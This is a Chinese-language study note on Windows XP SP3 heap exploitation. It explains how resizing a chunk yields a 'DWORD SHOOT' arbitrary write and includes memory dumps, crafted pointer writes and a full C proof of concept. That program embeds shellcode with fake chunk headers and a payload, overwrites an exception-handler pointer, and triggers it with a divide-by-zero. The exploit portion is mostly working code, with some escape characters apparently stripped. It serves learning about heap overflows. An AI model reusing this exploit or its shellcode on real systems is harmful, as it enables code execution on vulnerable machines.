利用chunk重设大小攻击堆

只是笔记························································

堆块学习···

DWORD SHOOT

下面环境为  XP   sp3 VC6.0  RELEASE

#include <windows.h>

int main()  
{  
    HLOCAL h1 = 0, h2 = 0;  
    HANDLE hp;  
    hp = HeapCreate(0,0x1000,0x10000);  
    h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,0x10);  

    return 0;  
}  

xp 下面介绍 CHUNK插入链表的过程：

执行完 HeapCreate 后  

开始拆卸链表:

接着开始关键部分:

到这里  新chunk的插入部分的关键部分也就结束了··············

总结：

[新chunk->flink]  = 旧chunk->flink

[新chunk->blink] = 旧chunk->blink

 [ 旧chunk->blink->flink ] = 新chunk

[旧chunk->blink] = 新chunk

 实际上是造成了一个向任意地址写入固定值得 漏洞 dword shoot

下面是正常情况反映················································

003A0688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A0698  2D 01 03 00 00 10 00 00 78 01 3A 00 78 01 3A 00  -
....x
:.x
:.
003A06A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A06B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A06C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A06D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A06E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

003A0688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A0698  03 00 03 00 8F 01 08 00 00 00 00 00 00 00 00 00  ..?.........
003A06A8  00 00 00 00 00 00 00 00 2A 01 03 00 00 10 00 00  ........*
....
003A06B8  78 01 3A 00 78 01 3A 00 00 00 00 00 00 00 00 00  x
:.x
:.........
003A06C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A06D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
003A06E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

在这里构造：在第二次分配之前！！！！

[0x003a06b8]      =   0x003a06eb

[0x003a0638+4]  =   0x0012ffe4

[0x0012ffe4]        =  0x003a06b8

[0x003a06eb+4]  =   0x003906b8

003A0688  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
003A0698  10 01 10 00 99 99 99 99 EB 06 3A 00 EB 06 3A 00  
.櫃櫃?:.?:.
003A06A8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
003A06B8  90 90 90 90 90 90 90 90 EB 31 90 90 90 90 90 90  悙悙悙悙?悙悙悙
003A06C8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
003A06D8  90 90 90 90 90 90 90 90 90 90 90 11 01 10 00 99  悙悙悙悙悙?
.
003A06E8  99 99 99 8C 06 3A 00 E4 FF 12 00

003A06B8   /EB 06           jmp X003A06C0
003A06BA   |3A00            cmp al,byte ptr ds:[eax]
003A06BC   |E4 FF           in al,0xFF
003A06BE   |1200            adc al,byte ptr ds:[eax]
003A06C0   EB 31           jmp X003A06F3             //而这个的EB 31 是我们故意设置的跳转

#include <stdio.h>
#include <windows.h>

	char shellcode[]=
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x10x01x10x00x99x99x99x99"

		"xEBx06x3ax00xEBx06x3ax00"

		"x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"xEBx31x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90"

		"x11x01x10x00x99x99x99x99x8Cx06x3ax00xb4xFFx12x00"
		"x90x90x90x90"

		"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
		"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
		"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
		"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
		"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
		"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
		"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
		"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
		"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
		"x53"
		"x68x64x61x30x23"
		"x68x23x50x61x6E"
		"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";
void main()
{	
	HLOCAL h1,h2;
	HANDLE hp;
	hp = HeapCreate(0,0x1000,0x10000);
//	__asm int 3
		h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	memcpy(h1,shellcode,300);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	int zero=0;
	zero=1/zero;
	printf("%d",zero);
}